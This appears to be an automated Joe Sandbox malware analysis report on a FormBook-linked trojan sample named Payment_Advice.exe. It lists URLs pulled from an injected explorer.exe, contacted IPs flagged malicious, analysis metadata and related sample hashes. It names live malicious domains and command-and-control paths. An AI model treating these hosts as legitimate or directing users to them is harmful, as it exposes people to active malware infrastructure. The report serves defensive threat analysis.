https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.jimenezfarmersinsurance.shopReferer: | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.1320detailingsupplies.com/hesf/ | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pendletonofficial.shop/hesf/ | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com | explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.othersidewear.comReferer: | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.87b52.club | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false |
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.tygyro.com/hesf/www.87b52.clubexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.87b52.clubReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.pendletonofficial.shopexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://android.notify.windows.com/iOSexplorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.pancakesandwaflesbeverages.netReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.schistdisc.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.87b52.club/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.homespy.netReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.jf66899j.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.1320detailingsupplies.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.brownkrosshui.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.schistdisc.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.jf66899j.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.schistdisc.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.jf66899j.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.im-newbie-journal.onlineReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.microexplorer.exe, 0000000F.00000002.3853009126.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1585353154.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.3853115679.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.brownkrosshui.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://wns.windows.com/EM0explorer.exe, 0000000F.00000000.1596839591.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.91fulizifen.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.brownkrosshui.com/hesf/www.usbulletinnow.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.1320detailingsupplies.com/hesf/www.jf66899j.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.svgco.lifeexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.tygyro.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
IP               Domain                        Country             ASN     ASN Name                                                Malicious
75.2.115.196     www.87b52.club                United States       16509   AMAZON-02US                                             true
77.222.40.147    www.othersidewear.com         Russian Federation  44112   SWEB-ASRU                                               true
66.96.160.140    www.im-newbie-journal.online  United States       29873   BIZLAND-SDUS                                            true
170.33.13.246    overdue.aliyun.com            Singapore           134963  ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited  false
142.234.186.98   www.91fulizifen.com           United States       395954  LEASEWEB-USA-LAX-11US                                   true
103.224.182.242  www.tygyro.com                Australia           133618  TRELLIAN-AS-APTrellianPtyLimitedAU                      true
91.195.240.19    parkingpage.namecheap.com     Germany             47846   SEDO-ASDE                                               false
62.72.50.244     usbulletinnow.com             Germany             5427    PRTL-DE                                                 true
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1320960
Start date and time: 2023-10-06 15:44:08 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Payment_Advice.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@105/31@10/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 194
• Number of non-executed functions: 219
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, rundll32.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time      Type             Description
15:45:18  API Interceptor  1x Sleep call for process: Payment_Advice.exe modified
15:45:23  API Interceptor  7012572x Sleep call for process: explorer.exe modified
15:46:11  API Interceptor  7783638x Sleep call for process: cmd.exe modified
                                                                                                  7LCsfHZ06y.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.217
                                                                                                  kyvhU0KdbE.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 198.54.117.211
                                                                                                  overdue.aliyun.comSecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.13.246
                                                                                                  SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.13.246
                                                                                                  file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                  • 170.33.13.246
                                                                                                  YSpCB8DEek.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.13.246
                                                                                                  w8jII3Mlbs.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.96.51
                                                                                                  PO 80555231 Pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.96.51
                                                                                                  2384de40-a1de-4db0-a358-6ea765fb272a.pptxGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.9.230
                                                                                                  e-dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  kgKZQkHkMV.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
